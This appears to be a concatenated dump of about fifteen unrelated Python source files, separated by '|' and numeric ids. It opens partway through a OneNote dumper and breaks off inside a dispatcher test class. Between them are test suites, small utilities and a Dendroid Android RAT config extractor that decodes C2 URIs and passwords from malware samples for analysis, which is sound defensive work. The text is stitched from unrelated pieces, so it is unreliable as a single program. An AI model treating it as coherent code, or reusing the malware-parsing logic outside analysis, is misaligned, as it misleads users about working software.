log_msg = f'Page {page_count}: {page["title"]}'
if args.start_page is None or page_count >= args.start_page:
logger.info(log_msg)
pipe.add_page(page)
pages += 1
else:
logger.info(log_msg + ' [skipped]')
if args.max_pages and page_count > args.max_pages:
break
except onenote.NotebookNotFound as e:
logger.error(str(e))
pipe.done()
stop_time = time.perf_counter()
logger.info('Done!')
logger.info('%s pages in %.1f seconds', pages, stop_time - start_time)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('notebook', help='display name of notebook to dump')
parser.add_argument('output_dir', help='directory to which to output')
parser.add_argument(
'-m', '--max-pages', type=int, help='max pages to dump'
)
parser.add_argument(
'-s', '--start-page', type=int, help='start page number to dump'
)
parser.add_argument(
'-n',
'--new-session',
action="store_true",
help='ignore saved auth token',
)
parser.add_argument(
'-v', '--verbose', action="store_true", help='show verbose output'
)
return parser.parse_args()
main()
|
16204
|
from common import Modules, data_strings, load_yara_rules, AndroidParseModule, ModuleMetadata
from base64 import b64decode
from string import printable
class dendroid(AndroidParseModule):
def __init__(self):
md = ModuleMetadata(
module_name="dendroid",
bot_name="Dendroid",
description="Android RAT",
authors=["<NAME> (@botnet_hunter)"],
version="1.0.0",
date="August 18, 2014",
references=[]
)
AndroidParseModule.__init__(self, md)
self.yara_rules = None
pass
def _generate_yara_rules(self):
if self.yara_rules is None:
self.yara_rules = load_yara_rules("dendroid.yara")
return self.yara_rules
def get_bot_information(self, file_data):
results = {}
uri = None
password = None
for s in data_strings(file_data, charset="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwx yz0123456789+/="):
try:
line = b64decode(s)
if len(line) == 0:
continue
valid = True
for c in line:
if c not in printable:
valid = False
if not valid:
continue
if line.lower().startswith("https://") or line.lower().startswith("http://"):
uri = line
continue
if uri is not None:
password = line
break
except TypeError:
continue
if uri is not None:
results["c2_uri"] = uri
if password is not None:
try:
password.decode("utf8")
results["password"] = password
except UnicodeDecodeError:
results["password"] = "h" + password.encode("hex")
return results
Modules.list.append(dendroid())
|
16233
|
import pytest
import rasterio as rio
from rasterio.io import DatasetWriter
from cog_worker import Manager
from rasterio import MemoryFile, crs
TEST_COG = "tests/roads_cog.tif"
@pytest.fixture
def molleweide_manager():
return Manager(
proj="+proj=moll",
scale=50000,
)
@pytest.fixture
def sample_function():
def myfunc(worker):
return worker.read(TEST_COG)
return myfunc
def test_preview(molleweide_manager, sample_function):
arr, bbox = molleweide_manager.preview(sample_function, max_size=123)
assert max(arr.shape) == 123, "Expected maximum array dimension to be 123px"
def test_tile(molleweide_manager, sample_function):
arr, bbox = molleweide_manager.tile(sample_function, x=1, y=2, z=3)
assert arr.shape == (1, 256, 256), "Expected 256x256 tile"
def test_chunk_execute(molleweide_manager, sample_function):
chunks = list(molleweide_manager.chunk_execute(sample_function, chunksize=123))
for arr, bbox in chunks:
assert max(arr.shape) <= 123, "Max chunk size should be 123px"
def test_chunk_params(molleweide_manager):
chunks = list(molleweide_manager.chunk_params(chunksize=123))
assert len(chunks) == 18, "Expected ~18 chunks for 123px tiles at 50km scale"
def test__open_writer(molleweide_manager):
with MemoryFile() as memfile:
with molleweide_manager._open_writer(memfile, 1, rio.ubyte) as writer:
assert isinstance(writer, DatasetWriter)
def test_chunk_save(molleweide_manager, sample_function):
full_arr = molleweide_manager.execute(sample_function)[0]
with MemoryFile() as memfile:
molleweide_manager.chunk_save(memfile, sample_function)
memfile.seek(0)
with rio.open(memfile) as src:
assert src.profile["crs"] == crs.CRS.from_string("+proj=moll")
assert src.profile["transform"][0] == 50000
arr = src.read()
assert arr.shape == full_arr.shape
assert (
abs(arr.sum() / full_arr.data.sum() - 1) < 0.002
), "Error should be less than 0.2%"
def test__write_chunk(molleweide_manager, sample_function):
with MemoryFile() as memfile:
arr, bbox = molleweide_manager.execute(sample_function)
print(arr.mask.sum())
with molleweide_manager._open_writer(memfile, 1, rio.ubyte) as writer:
molleweide_manager._write_chunk(writer, arr, bbox)
memfile.seek(0)
with rio.open(memfile) as src:
written = src.read(masked=True)
assert (written == arr).all()
assert (written.mask == arr.mask).all()
def test__chunk_bounds(molleweide_manager):
chunk = molleweide_manager._chunk_bounds(0, 0, 123)
assert chunk == (
-18040095.696147293,
2674978.852256801,
-11890095.696147293,
8824978.852256801,
)
def test__num_chunks(molleweide_manager):
assert molleweide_manager._num_chunks(123) == (6, 3)
|
16310
|
from django.test import TestCase
from django_hosts import reverse
from util.test_utils import Get, assert_requesting_paths_succeeds
class UrlTests(TestCase):
def test_all_get_request_paths_succeed(self):
path_predicates = [
Get(reverse('skills_present_list'), public=True),
Get(reverse('profile'), public=False),
Get(reverse('suggest'), public=False),
]
assert_requesting_paths_succeeds(self, path_predicates)
|
16321
|
from PyQt5.QtCore import *
class ConstrainedOpt(QThread):
signal_update_voxels = pyqtSignal(str)
def __init__(self, model,index):
QThread.__init__(self)
self.model = model['model']
# self.model = model
self.name = model['name']
self.index = index
def run(self):
# while True:
self.update_voxel_model()
def update_voxel_model(self):
self.signal_update_voxels.emit('update_voxels')
|
16340
|
from direct.directnotify import DirectNotifyGlobal
from direct.distributed.DistributedObjectAI import DistributedObjectAI
class DistributedPlantBaseAI(DistributedObjectAI):
notify = DirectNotifyGlobal.directNotify.newCategory('DistributedPlantBaseAI')
|
16345
|
from Redy.Opt import feature, constexpr
import timeit
class Closure(tuple):
def __call__(self, a):
c, f = self
return f(c, a)
def f1(x):
def g(y):
return x + y
return g
def fc(c, y):
return c + y
@feature(constexpr)
def f2(x):
return constexpr[Closure]((x, constexpr[fc]))
print(f1(1)(2))
print(f2(1)(2))
# 3
# 3
# mk closure
print(timeit.timeit("f(1)", globals=dict(f=f1)))
print(timeit.timeit("f(1)", globals=dict(f=f2)))
# 0.15244655999958923
# 0.16590227899905585
f1_ = f1(2)
f2_ = f2(2)
print(timeit.timeit("f(1)", globals=dict(f=f1_)))
print(timeit.timeit("f(1)", globals=dict(f=f2_)))
# 0.08070355000018026
# 0.20936105600048904
# So, use builtin closures instead of making our own
|
16384
|
import picamera
from time import sleep
IMG_WIDTH = 800
IMG_HEIGHT = 600
IMAGE_DIR = "/home/pi/Desktop/"
IMG = "snap.jpg"
def vid():
camera = picamera.PiCamera()
camera.vflip = True
camera.hflip = True
camera.brightness = 60
#camera.resolution = (IMG_WIDTH, IMG_HEIGHT)
camera.start_preview()
camera.annotate_text = "Doorbell pressed!"
camera.annotate_text_size = 50
#display video for 5 seconds
sleep(5)
camera.stop_preview()
camera.close()
# https://www.raspberrypi.org/learning/tweeting-babbage/worksheet/
######################################################
# picamera default values:
######################################################
# camera.sharpness = 0
# camera.contrast = 0
# camera.brightness = 50
# camera.saturation = 0
# camera.ISO = 0
# camera.video_stabilization = False
# camera.exposure_compensation = 0
# camera.exposure_mode = 'auto'
# camera.meter_mode = 'average'
# camera.awb_mode = 'auto'
# camera.image_effect = 'none'
# camera.color_effects = None
# camera.rotation = 180
# camera.hflip = False
# camera.vflip = False
# camera.crop = (0.0, 0.0, 1.0, 1.0)
######################################################
# video will record 5 seconds
######################################################
# camera.start_recording('video.h264')
# sleep(5)
# camera.stop_recording()
######################################################
# add text to video:
######################################################
#camera.start_preview()
#camera.annotate_text = "Doorbell pressed!"
#camera.annotate_text_size = 50
#sleep(5)
#camera.capture('/home/pi/Desktop/text.jpg')
#camera.stop_preview()
######################################################
# loop over camera effects:
######################################################
#camera = picamera.PiCamera()
#camera.vflip = True
#camera.hflip = True
#camera.start_preview()
#for effect in camera.IMAGE_EFFECTS:
# camera.image_effect = effect
# camera.annotate_text = "Effect: %s" % effect
# sleep(1)
#camera.stop_preview()
|
16448
|
import click
from kryptos.scripts import build_strategy, stress_worker, kill_strat
@click.group(name="strat")
def cli():
pass
cli.add_command(build_strategy.run, "build")
cli.add_command(stress_worker.run, "stress")
cli.add_command(kill_strat.run, "kill")
|
16485
|
import numpy as np
import unittest
import coremltools.models.datatypes as datatypes
from coremltools.models import neural_network as neural_network
from coremltools.models import MLModel
from coremltools.models.neural_network.printer import print_network_spec
from coremltools.converters.nnssa.coreml.graph_pass.mlmodel_passes import \
remove_disconnected_layers, transform_conv_crop, remove_redundant_transposes
import copy
import pytest
DEBUG = False
np.random.seed(100)
class MLModelPassesTest(unittest.TestCase):
def test_load_constant_remove(self):
input_features = [('data', datatypes.Array(*(3, 4)))]
output_features = [('out', None)]
builder = neural_network.NeuralNetworkBuilder(input_features, output_features, disable_rank5_shape_mapping=True)
builder.add_activation('relu1', 'RELU', 'data', 'relu1')
builder.add_load_constant_nd('const1', 'c1', constant_value=np.ones((5,)), shape=(5,))
builder.add_activation('relu2', 'RELU', 'relu1', 'out')
builder.add_load_constant_nd('const2', 'c2', constant_value=np.ones((5,)), shape=(5,))
builder.add_load_constant_nd('const3', 'c3', constant_value=np.ones((5,)), shape=(5,))
spec = builder.spec
np.testing.assert_equal(5, len(spec.neuralNetwork.layers))
remove_disconnected_layers(spec)
np.testing.assert_equal(2, len(spec.neuralNetwork.layers))
def test_dead_layer_remove(self):
input_features = [('data', datatypes.Array(*(3, 4)))]
output_features = [('out', None)]
builder = neural_network.NeuralNetworkBuilder(input_features, output_features, disable_rank5_shape_mapping=True)
builder.add_activation('relu1', 'RELU', 'data', 'relu1')
builder.add_load_constant_nd('const1', 'c1', constant_value=np.ones((5,)), shape=(5,))
builder.add_load_constant_nd('const2', 'c2', constant_value=np.ones((5,)), shape=(5,))
builder.add_split_nd('splitnd1', 'const2', ['s1', 's2', 's3'], axis=0, num_splits=3)
builder.add_squeeze('squeeze', 's1', 'squeeze_out')
builder.add_activation('relu4', 'RELU', 's2', 'relu4')
builder.add_activation('relu5', 'RELU', 'relu4', 'relu5')
builder.add_load_constant_nd('const3', 'c3', constant_value=np.ones((5,)), shape=(5,))
builder.add_activation('relu2', 'RELU', 'relu1', 'out')
spec = builder.spec
np.testing.assert_equal(9, len(spec.neuralNetwork.layers))
remove_disconnected_layers(spec)
np.testing.assert_equal(2, len(spec.neuralNetwork.layers))
@pytest.mark.xfail
def test_dead_layer_remove_branch(self):
convergence_tolerance = 1e-8
input_features = [('input', datatypes.Array(*(2,)))]
output_features = [('out', None)]
builder = neural_network.NeuralNetworkBuilder(input_features, output_features, disable_rank5_shape_mapping=True)
# add condition to break from the loop, if convergence criterion is met
builder.add_less_than('cond', ['input'], 'cond', alpha=convergence_tolerance)
branch_layer = builder.add_branch('branch_layer', 'cond')
builder_ifbranch = neural_network.NeuralNetworkBuilder(nn_spec=branch_layer.branch.ifBranch)
builder_ifbranch.add_activation('relu1', 'RELU', 'input', 'relu1_out')
builder_ifbranch.add_activation('relu2_out', 'RELU', 'relu1_out', 'relu2_out')
builder_elsebranch = neural_network.NeuralNetworkBuilder(nn_spec=branch_layer.branch.elseBranch)
builder_elsebranch.add_activation('linear1', 'LINEAR', 'input', 'linear1_out')
builder_elsebranch.add_activation('linear2', 'LINEAR', 'linear1_out', 'relu2_out')
builder.add_squeeze('out', 'input', 'out', squeeze_all=True)
mlmodel = MLModel(builder.spec)
data = np.random.rand(2,)
data_dict = {'input': data}
before_pass_out = mlmodel.predict(data_dict)['out']
if DEBUG:
print('\n mlmodel description before remove disconnected layers pass: \n')
print_network_spec(builder.spec, style='coding')
remove_disconnected_layers(builder.spec)
if DEBUG:
print('\n mlmodel description after remove disconnected layers pass: \n')
print_network_spec(builder.spec, style='coding')
mlmodel = MLModel(builder.spec)
after_pass_out = mlmodel.predict(data_dict)['out']
np.testing.assert_almost_equal(before_pass_out, after_pass_out, decimal=2)
np.testing.assert_equal(len(builder.spec.neuralNetwork.layers), 1)
@pytest.mark.xfail
def test_dead_layer_partial_branch(self):
convergence_tolerance = 1e-8
input_features = [('input', datatypes.Array(*(2,)))]
output_features = [('out', None)]
builder = neural_network.NeuralNetworkBuilder(input_features, output_features, disable_rank5_shape_mapping=True)
# add condition to break from the loop, if convergence criterion is met
builder.add_less_than('cond', ['input'], 'cond', alpha=convergence_tolerance)
branch_layer = builder.add_branch('branch_layer', 'cond')
builder_ifbranch = neural_network.NeuralNetworkBuilder(nn_spec=branch_layer.branch.ifBranch)
builder_ifbranch.add_activation('relu1', 'RELU', 'input', 'relu1_out')
builder_ifbranch.add_activation('relu2_out', 'RELU', 'relu1_out', 'relu2_out')
builder_elsebranch = neural_network.NeuralNetworkBuilder(nn_spec=branch_layer.branch.elseBranch)
builder_elsebranch.add_activation('linear1', 'LINEAR', 'input', 'linear1_out')
builder_elsebranch.add_activation('linear_red_1', 'LINEAR', 'input', 'linear_red1_out')
builder_elsebranch.add_activation('linear_red_2', 'LINEAR', 'linear_red1_out', 'linear_red2_out')
builder_elsebranch.add_activation('linear2', 'LINEAR', 'linear1_out', 'relu2_out')
builder.add_squeeze('out', 'relu2_out', 'out', squeeze_all=True)
mlmodel = MLModel(builder.spec)
data = np.random.rand(2,)
data_dict = {'input': data}
before_pass_out = mlmodel.predict(data_dict)['out']
if DEBUG:
print('\n mlmodel description before remove disconnected layers pass: \n')
print_network_spec(builder.spec, style='coding')
old_spec = copy.copy(builder.spec)
remove_disconnected_layers(builder.spec)
if DEBUG:
print('\n mlmodel description after remove disconnected layers pass: \n')
print_network_spec(builder.spec, style='coding')
mlmodel = MLModel(builder.spec)
after_pass_out = mlmodel.predict(data_dict)['out']
np.testing.assert_almost_equal(before_pass_out, after_pass_out, decimal=2)
np.testing.assert_equal(len(old_spec.neuralNetwork.layers[1].branch.ifBranch.layers),
len(builder.spec.neuralNetwork.layers[1].branch.ifBranch.layers))
np.testing.assert_equal(len(builder.spec.neuralNetwork.layers[1].branch.elseBranch.layers), 2)
def test_conv_crop_bn_to_conv_bn_crop(self):
input_features = [('data', datatypes.Array(1, 10, 10))]
output_features = [('out', None)]
builder = neural_network.NeuralNetworkBuilder(input_features, output_features)
W = np.ones((2,10,1,10), dtype=np.float32)
builder.add_convolution(name='conv',
kernel_channels=1,
output_channels=2,
height=2, width=2,
stride_height=1, stride_width=1,
border_mode='valid', groups=1,
W=W,
b=None, has_bias=False,
input_name='data', output_name='conv_out')
builder.add_crop(name='crop',
left=1, right=1, top=1, bottom=1, offset=0,
input_names=['conv_out'],
output_name='crop_out')
builder.add_batchnorm(name='bn',
channels=2,
gamma=np.ones(2,).astype(np.float32),
beta=np.ones(2,).astype(np.float32),
mean=np.ones(2,).astype(np.float32),
variance=np.ones(2,).astype(np.float32),
input_name='crop_out',
output_name='out')
# Conv -> Crop -> BN
spec = builder.spec.neuralNetwork
np.testing.assert_equal('crop', spec.layers[1].WhichOneof('layer'))
np.testing.assert_equal('batchnorm', spec.layers[2].WhichOneof('layer'))
# transform the pattern
transform_conv_crop(builder.spec)
# Conv -> BN -> Crop
np.testing.assert_equal('batchnorm', spec.layers[1].WhichOneof('layer'))
np.testing.assert_equal('crop', spec.layers[2].WhichOneof('layer'))
def test_conv_crop_bn_relu_to_conv_bn_relu_crop(self):
input_features = [('data', datatypes.Array(1, 10, 10))]
output_features = [('out', None)]
builder = neural_network.NeuralNetworkBuilder(input_features, output_features)
W = np.ones((2,10,1,10), dtype=np.float32)
builder.add_convolution(name='conv',
kernel_channels=1,
output_channels=2,
height=2, width=2,
stride_height=1, stride_width=1,
border_mode='valid', groups=1,
W=W,
b=None, has_bias=False,
input_name='data', output_name='conv_out')
builder.add_crop(name='crop',
left=1, right=1, top=1, bottom=1, offset=0,
input_names=['conv_out'],
output_name='crop_out')
builder.add_batchnorm(name='bn',
channels=2,
gamma=np.ones(2,).astype(np.float32),
beta=np.ones(2,).astype(np.float32),
mean=np.ones(2,).astype(np.float32),
variance=np.ones(2,).astype(np.float32),
input_name='crop_out',
output_name='bn_out')
builder.add_activation(name='relu',
non_linearity='RELU',
input_name='bn_out',
output_name='out')
# Conv -> Crop -> BN -> ReLU
spec = builder.spec.neuralNetwork
np.testing.assert_equal('crop', spec.layers[1].WhichOneof('layer'))
np.testing.assert_equal('batchnorm', spec.layers[2].WhichOneof('layer'))
np.testing.assert_equal('activation', spec.layers[3].WhichOneof('layer'))
# transform the pattern
transform_conv_crop(builder.spec)
# Conv -> BN -> ReLU -> Crop
np.testing.assert_equal('batchnorm', spec.layers[1].WhichOneof('layer'))
np.testing.assert_equal('activation', spec.layers[2].WhichOneof('layer'))
np.testing.assert_equal('crop', spec.layers[3].WhichOneof('layer'))
def test_redundant_transposes(self):
def _build_and_test_network(input_size, transpose_layers, expected_layers):
"""
Helper function for testing transpose removal.
Args:
input_size: Size of the input network tensor.
transpose_layers: Array of transpose axes definitions.
expected_layers: Array of indices into transpose_layers indicating
which of the transpose layers should be present after the
graph pass.
"""
input_features = [('data', datatypes.Array(*input_size))]
output_features = [('out', None)]
builder = neural_network.NeuralNetworkBuilder(input_features, output_features)
last_layer = 'data'
for idx, axes in enumerate(transpose_layers):
name = 't{}'.format(idx)
if idx == len(transpose_layers) - 1:
output_name = 'out'
else:
output_name = name + '_out'
builder.add_transpose(name=name,
axes=axes,
input_name=last_layer,
output_name=output_name)
last_layer = output_name
spec = builder.spec.neuralNetwork
# Check the network before the graph pass.
for idx in range(len(transpose_layers)):
np.testing.assert_equal('transpose', spec.layers[idx].WhichOneof('layer'))
# Run the removal pass.
remove_redundant_transposes(builder.spec)
# Verify only the expected layers remain.
np.testing.assert_equal(len(spec.layers), len(expected_layers))
for output_layer_idx, input_layer_idx in enumerate(expected_layers):
np.testing.assert_equal(
'transpose',
spec.layers[output_layer_idx].WhichOneof('layer')
)
np.testing.assert_array_equal(
transpose_layers[input_layer_idx],
spec.layers[output_layer_idx].transpose.axes
)
_build_and_test_network(
input_size=[1, 10, 10],
# These transposes together are the identity.
transpose_layers=[[2, 0, 1], [1, 2, 0]],
expected_layers=[],
)
_build_and_test_network(
input_size=[1, 10, 10],
# These transposes are not inverses.
transpose_layers=[[2, 0, 1], [2, 0, 1]],
expected_layers=[0, 1],
)
_build_and_test_network(
input_size=[1, 1, 10, 10, 3],
# First two are the identity, then an extra.
transpose_layers=[[2, 4, 1, 0, 3], [3, 2, 0, 4, 1], [1, 0, 2, 3, 4]],
expected_layers=[2],
)
_build_and_test_network(
input_size=[1, 1, 10, 10, 3],
# First is okay, next two are the identity.
transpose_layers=[[1, 0, 2, 3, 4], [2, 4, 1, 0, 3], [3, 2, 0, 4, 1]],
expected_layers=[0],
)
# A slightly more complicated test case where there are two transposes
# in topological order, but are actually in parallel in the graph.
builder = neural_network.NeuralNetworkBuilder(
[('data', datatypes.Array(2, 4, 8))],
[('out', None)]
)
last_layer = 'data'
builder.add_transpose(name='t1',
axes=[0, 2, 1],
input_name='data',
output_name='t1')
builder.add_transpose(name='t2',
axes=[0, 2, 1],
input_name='data',
output_name='t2')
builder.add_stack(name='stack',
input_names=['t1', 't2'],
output_name='out')
spec = builder.spec.neuralNetwork
# Run the removal pass.
remove_redundant_transposes(builder.spec)
# Verify nothing was removed.
np.testing.assert_equal(len(spec.layers), 3)
if __name__ == '__main__':
RUN_ALL_TESTS = True
if RUN_ALL_TESTS:
unittest.main()
else:
suite = unittest.TestSuite()
suite.addTest(MLModelPassesTest('test_load_constant_remove'))
unittest.TextTestRunner().run(suite)
|
16496
|
import json
sequence_name_list = ['A','G','L','map2photo','S']
description_list = ['Viewpoint Appearance','Viewpoint','ViewPoint Lighting','Map to Photo','Modality']
label_list = [
['arch', 'obama', 'vprice0', 'vprice1', 'vprice2', 'yosemite'],
['adam', 'boat','ExtremeZoomA','face','fox','graf','mag','shop','there','vin'],
['amos1','bdom','brugge_square', 'GC2','light','madrid',\
'notredame15','paintedladies','rushmore','trevi','vatican'],
['map1', 'map2', 'map3', 'map4', 'map5', 'map6'],
['angiogram','brain1','EO-IR-2',\
'maunaloa','mms68','mms75','treebranch']
]
#label_list = [
# ['arch', 'obama', 'vprice0', 'vprice1', 'vprice2', 'yosemite']
# ]
json_data = {}
json_data['Dataset Name'] = 'W1BS'
json_data['Description'] = 'Baseline Stereo Benchmark'
json_data['url'] = 'http://cmp.felk.cvut.cz/wbs/datasets/W1BS_with_patches.tar.gz'
json_data['Sequence Number'] = len(sequence_name_list)
json_data['Sequence Name List'] = sequence_name_list
json_data['Sequences'] = []
for idx, sequence_name in enumerate(sequence_name_list):
sequence = {}
sequence['Name'] = sequence_name
sequence['Description'] = sequence_name
sequence['Label'] = description_list[idx]
sequence['Images'] = []
sequence['Image Number'] = len(label_list[idx])*2
sequence['Link Number'] = len(label_list[idx])
sequence['Links'] = []
for image_idx, image_label in enumerate(label_list[idx]):
image = {}
image['file'] = '{}/1/{}.bmp'.format(sequence_name,image_label)
image['id'] = str(image_label) + '_1'
image['label'] = str(image_label) + '_1'
sequence['Images'].append(image)
image = {}
image['file'] = '{}/2/{}.bmp'.format(sequence_name,image_label)
image['id'] = str(image_label) + '_2'
image['label'] = str(image_label) + '_2'
sequence['Images'].append(image)
link = {}
link['source'] = str(image_label) + '_1'
link['target'] = str(image_label) + '_2'
link['file'] = '{}/h/{}.txt'.format(sequence_name, image_label)
sequence['Links'].append(link)
json_data['Sequences'].append(sequence)
with open('./datasets/dataset_info/{}.json'.format('W1BS'),'w') as json_file:
json.dump(json_data, json_file, indent=2)
|
16534
|
from opt_utils import *
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--skip_compilation", action='store_true', help="skip compilation")
args = parser.parse_args()
if not args.skip_compilation:
compile_all_opt_examples()
for example in all_examples:
args = []
output = run_example(example, args, True).decode('ascii')
with open(example + ".log", "w") as text_file:
text_file.write(output)
|
16539
|
import unittest
from unittest.mock import Mock
import mock
import peerfinder.peerfinder as peerfinder
import requests
from ipaddress import IPv6Address, IPv4Address
class testPeerFinder(unittest.TestCase):
def setUp(self):
self.netixlan_set = {
"id": 1,
"ix_id": 2,
"name": "Test IX",
"ixlan_id": 3,
"notes": "",
"speed": 1000,
"asn": 65536,
"ipaddr4": ["192.0.2.1"],
"ipaddr6": ["0100::"],
"is_rs_peer": True,
"operational": True,
"created": "2010-01-01T00:00:00Z",
"updated": "2010-01-01T00:00:00Z",
"status": "ok",
}
self.netfac_set = {
"id": 1,
"name": "Test Facility",
"city": "Dublin",
"country": "IE",
"fac_id": 1,
"local_asn": 65536,
"created": "2010-01-01T00:00:00Z",
"updated": "2010-01-01T00:00:00Z",
"status": "ok",
}
self.peer = {"name": "<NAME>", "asn": 65536}
def test_pdb_to_ixp(self):
expected = peerfinder.IXP(
name="Test IX",
subnet4=[IPv4Address("192.0.2.1")],
subnet6=[IPv6Address("0100::")],
speed=1000,
)
self.assertEqual(expected, peerfinder.pdb_to_ixp(self.netixlan_set))
def test_pdb_to_peer(self):
ixp = peerfinder.pdb_to_ixp(self.netixlan_set)
fac = peerfinder.pdb_to_fac(self.netfac_set)
expected = peerfinder.Peer(
name="<NAME>", ASN=65536, peering_on=ixp, present_in=fac,
)
self.assertEqual(expected, peerfinder.pdb_to_peer(self.peer, ixp, fac))
def test_pdb_to_fac(self):
expected = peerfinder.Facility(name="Test Facility", ASN=65536)
self.assertEqual(expected, peerfinder.pdb_to_fac(self.netfac_set))
def test__dedup_ixs(self):
expected = {
"Test IX": {
"ipaddr4": [["192.0.2.1"], ["192.0.2.1"]],
"ipaddr6": [["0100::"], ["0100::"]],
"name": "Test IX",
"speed": 2000,
}
}
self.assertEqual(
expected, peerfinder._dedup_ixs([self.netixlan_set, self.netixlan_set]),
)
def test_fetch_ix_from_ixps(self):
expected = peerfinder.pdb_to_ixp(self.netixlan_set)
ixp = [peerfinder.pdb_to_ixp(self.netixlan_set)]
self.assertEqual(expected, peerfinder.fetch_ix_from_ixps("Test IX", ixp))
def test_fetch_fac_from_facilities(self):
expected = peerfinder.pdb_to_fac(self.netfac_set)
fac = [peerfinder.pdb_to_fac(self.netfac_set)]
self.assertEqual(expected, peerfinder.fetch_ix_from_ixps("Test Facility", fac))
def test_fetch_common_ixps(self):
ixp = [peerfinder.pdb_to_ixp(self.netixlan_set)]
fac = [peerfinder.pdb_to_fac(self.netfac_set)]
peer = [peerfinder.pdb_to_peer(self.peer, ixp, fac)]
expected = {"Test IX"}
self.assertEqual(expected, peerfinder.fetch_common_ixps(peer))
def test_fetch_common_facilities(self):
ixp = [peerfinder.pdb_to_ixp(self.netixlan_set)]
fac = [peerfinder.pdb_to_fac(self.netfac_set)]
peer = [peerfinder.pdb_to_peer(self.peer, ixp, fac)]
expected = {"Test Facility"}
self.assertEqual(expected, peerfinder.fetch_common_facilities(peer))
@mock.patch.object(requests, "get", autospec=True)
def test_getPeeringDBSuccess(self, requests_mock):
r_mock = Mock()
r_mock.status_code = 200
r_mock.text = "some text"
r_mock.json.return_value = {"data": [0]}
requests_mock.return_value = r_mock
expected = {"data": [0]}
self.assertEqual(expected, peerfinder.getPeeringDB("23456"))
def test_fetch_fac_from_facilities(self):
fac = [peerfinder.pdb_to_fac(self.netfac_set)]
fac_name = "Test Facility"
expected = peerfinder.Facility(name="Test Facility", ASN=65536)
self.assertEqual(expected, peerfinder.fetch_fac_from_facilities(fac_name, fac))
def test_fetch_different_ixps(self):
ix1 = peerfinder.IXP(
name="Test IX1",
subnet4=[IPv4Address("192.0.2.1")],
subnet6=[IPv6Address("0100::")],
speed=1000,
)
ix2 = peerfinder.IXP(
name="Test IX2",
subnet4=[IPv4Address("192.0.2.2")],
subnet6=[IPv6Address("0100::")],
speed=1000,
)
expected = ["Test IX1", "Test IX2"]
peer1 = peerfinder.Peer(name="peer1", ASN=1, present_in=[], peering_on=[ix1])
peer2 = peerfinder.Peer(name="peer2", ASN=1, present_in=[], peering_on=[ix2])
self.assertEqual(expected, peerfinder.fetch_different_ixps([peer1, peer2]))
def test_print_ixp(self):
ix1 = peerfinder.IXP(
name="Test IX1",
subnet4=[IPv4Address("192.0.2.1")],
subnet6=[IPv6Address("0100::")],
speed=1000,
)
ix2 = peerfinder.IXP(
name="Test IX2",
subnet4=[IPv4Address("192.0.2.2")],
subnet6=[IPv6Address("0100::")],
speed=1000,
)
peer1 = peerfinder.Peer(name="peer1", ASN=1, present_in=[], peering_on=[ix1])
peer2 = peerfinder.Peer(
name="peer2", ASN=1, present_in=[], peering_on=[ix1, ix2]
)
self.assertIsNone(peerfinder.print_ixp([peer1, peer2]))
def test_print_fac(self):
fac1 = peerfinder.Facility(name="Test Facility 1", ASN=1,)
fac2 = peerfinder.Facility(name="Test Facility 2", ASN=1,)
peer1 = peerfinder.Peer(
name="peer1", ASN=1, present_in=[fac1, fac2], peering_on=[]
)
peer2 = peerfinder.Peer(name="peer2", ASN=1, present_in=[fac1], peering_on=[])
self.assertIsNone(peerfinder.print_fac([peer1, peer2]))
def test_print_uncommon(self):
ix1 = peerfinder.IXP(
name="Test IX1",
subnet4=[IPv4Address("192.0.2.1")],
subnet6=[IPv6Address("0100::")],
speed=1000,
)
ix2 = peerfinder.IXP(
name="Test IX2",
subnet4=[IPv4Address("192.0.2.2")],
subnet6=[IPv6Address("0100::")],
speed=1000,
)
peer1 = peerfinder.Peer(name="peer1", ASN=1, present_in=[], peering_on=[ix1])
peer2 = peerfinder.Peer(
name="peer2", ASN=1, present_in=[], peering_on=[ix1, ix2]
)
self.assertIsNone(peerfinder.print_uncommon([peer1, peer2]))
if __name__ == "__main__":
unittest.main()
|
16543
|
import unittest
from ..dispatcher import Dispatcher
class Math:
@staticmethod
def sum(a, b):
return a + b
@classmethod
def diff(cls, a, b):
return a - b
def mul(self, a, b):
return a * b
class TestDispatcher(unittest.TestCase):
def test_empty(self):
self.assertEqual(len(Dispatcher()), 0)
def test_add_function(self):
d = Dispatcher()
@d.add_function
def one():
return 1
def two():
return 2
d.add_function(two)
d.add_function(two, name="two_alias")
self.assertIn("one", d)
self.assertEqual(d["one"](), 1)
self.assertIsNotNone(one) # do not remove function from the scope
self.assertIn("two", d)
self.assertIn("two_alias", d)
def test_class(self):
d1 = Dispatcher()
d1.add_class(Math)
self.assertIn("math.sum", d1)
self.assertIn("math.diff", d1)
self.assertIn("math.mul", d1)
self.assertEqual(d1["math.sum"](3, 8), 11)
self.assertEqual(d1["math.diff"](6, 9), -3)
self.assertEqual(d1["math.mul"](2, 3), 6)
d2 = Dispatcher(Math)
self.assertNotIn("__class__", d2)
self.assertEqual(d1.keys(), d2.keys())
for method in ["math.sum", "math.diff"]:
self.assertEqual(d1[method], d2[method])
def test_class_prefix(self):
d = Dispatcher(Math, prefix="")
self.assertIn("sum", d)
self.assertNotIn("math.sum", d)
def test_object(self):
math = Math()
d1 = Dispatcher()
d1.add_object(math)
self.assertIn("math.sum", d1)
self.assertIn("math.diff", d1)
self.assertEqual(d1["math.sum"](3, 8), 11)
self.assertEqual(d1["math.diff"](6, 9), -3)
d2 = Dispatcher(math)
self.assertNotIn("__class__", d2)
self.assertEqual(d1, d2)
def test_object_prefix(self):
d = Dispatcher(Math(), prefix="")
self.assertIn("sum", d)
self.assertNotIn("math.sum", d)
def test_add_dict(self):
d = Dispatcher()
d.add_prototype({"sum": lambda *args: sum(args)}, "util.")
self.assertIn("util.sum", d)
self.assertEqual(d["util.sum"](13, -2), 11)
def test_init_from_dict(self):
d = Dispatcher({
"one": lambda: 1,
"two": lambda: 2,
})
self.assertIn("one", d)
self.assertIn("two", d)
def test_del_method(self):
d = Dispatcher()
d["method"] = lambda: ""
self.assertIn("method", d)
del d["method"]
self.assertNotIn("method", d)
def test_to_dict(self):
d = Dispatcher()
def func():
return ""
d["method"] = func
self.assertEqual(dict(d), {"method": func})
def test__getattr_function(self):
# class
self.assertEqual(Dispatcher._getattr_function(Math, "sum")(3, 2), 5)
self.assertEqual(Dispatcher._getattr_function(Math, "diff")(3, 2), 1)
self.assertEqual(Dispatcher._getattr_function(Math, "mul")(3, 2), 6)
# object
self.assertEqual(Dispatcher._getattr_function(Math(), "sum")(3, 2), 5)
